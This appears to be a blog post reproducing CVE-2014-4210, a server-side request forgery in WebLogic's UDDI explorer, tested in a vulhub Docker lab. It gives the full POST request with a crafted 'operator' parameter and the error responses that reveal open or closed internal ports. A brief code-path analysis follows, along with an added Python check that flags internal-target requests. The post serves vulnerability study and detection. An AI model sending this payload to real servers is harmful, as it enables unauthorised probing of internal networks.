CVE-2014-4210

WebLogic SSRF vulnerability

Affected versions:
WebLogic 10.0.2 – 10.3.6

Test environment: vulhub/weblogic:10.3.6.0-2017

Reproduction steps:

1. Start the environment

docker-compose up -d

2. Open the WebLogic service URL

http://*.*.*.*:7001/uddiexplorer/SearchPublicRegistries.jsp

3. Click Search, then modify the request parameters

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: *.*.*.*:7001
Content-Length: 128
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://*.*.*.*:7001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://*.*.*.*:7001/uddiexplorer/SearchPublicRegistries.jsp
Accept-Language: zh-CN,zh;q=0.9
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; _ga=GA1.1.1880396411.1639305437; JSESSIONID=GGryvqyXfhMK7jPvTqhLvTpGDzGfm4L442Vb2mt3rd1tjT2JL9Kg!1185397968
Connection: close

rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

4. Response

<!-- Port open, service listening -->
<table width=100% cellpadding=5 cellspacing=5 valign=top>
  <p>An error has occurred<BR>
  weblogic.uddi.client.structures.exception.XML_SoapException: The server at http://127.0.0.1:7001 returned a 404 error code &#40;Not Found&#41;.  Please ensure that your URL is correct, and the web service has deployed without error.
</table>

<!-- Port closed, no service listening -->
<table width=100% cellpadding=5 cellspacing=5 valign=top>
  <p>An error has occurred<BR>
  weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: &#39;1&#39; addresses, but could not connect over HTTP to server: &#39;127.0.0.1&#39;, port: &#39;80&#39;
</table>

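Analysis:

1. The received operator value is passed in as a parameter, and the search.setOperator method is called with it.

2. The search.getResponse method calls the send and receive methods of the Http11ClientBinding object, and failures are thrown as an IOException. The result is the response shown in reproduction step 4.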
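
As an added example (not code from the original post or from WebLogic), a proxy-side or WAF-side check for the request in step 3: it parses a captured HTTP request, extracts the operator parameter and reports any target outside an allow-list. The allow-list contents (the registry hosts from the page's publicinquiryurls cookie), the function names and the weblogic.example host are assumptions of this example.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

UDDI_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"
# Registry hosts taken from the page's publicinquiryurls cookie; treating them
# as the allow-list is an assumption of this example.
ALLOWED_HOSTS = {"www-3.ibm.com", "uddi.rte.microsoft.com", "services.xmethods.net"}

def classify_operator(value):
    """Return 'allowed', 'internal', 'external' or 'invalid' for an operator URL."""
    try:
        parts = urlsplit(value.strip())
        host = (parts.hostname or "").lower()
    except ValueError:
        return "invalid"
    if parts.scheme not in ("http", "https") or not host:
        return "invalid"
    if host in ALLOWED_HOSTS:
        return "allowed"
    if host == "localhost" or host.endswith(".localhost"):
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a hostname: resolve it before trusting this verdict
    internal = ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_unspecified
    return "internal" if internal else "external"

def inspect_request(raw):
    """Parse one raw HTTP request; return (operator, verdict) pairs to alert on."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    line = head.split("\n", 1)[0].split()
    if len(line) < 2 or line[0] != "POST" or urlsplit(line[1]).path != UDDI_PATH:
        return []
    operators = parse_qs(body.strip(), keep_blank_values=True).get("operator", [])
    return [(op, v) for op in operators if (v := classify_operator(op)) != "allowed"]

# Constructed sample: the request from step 3, reduced to the fields the check needs.
SAMPLE = (
    "POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1\r\n"
    "Host: weblogic.example:7001\r\n"
    "\r\n"
    "rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location"
    "&btnSubmit=Search&operator=http://127.0.0.1:7001"
)

if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```

A response body containing either XML_SoapException message from step 4 is a second signal that the server attempted the outbound connection.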

posted @ 2022-03-11 11:36  coolcoolha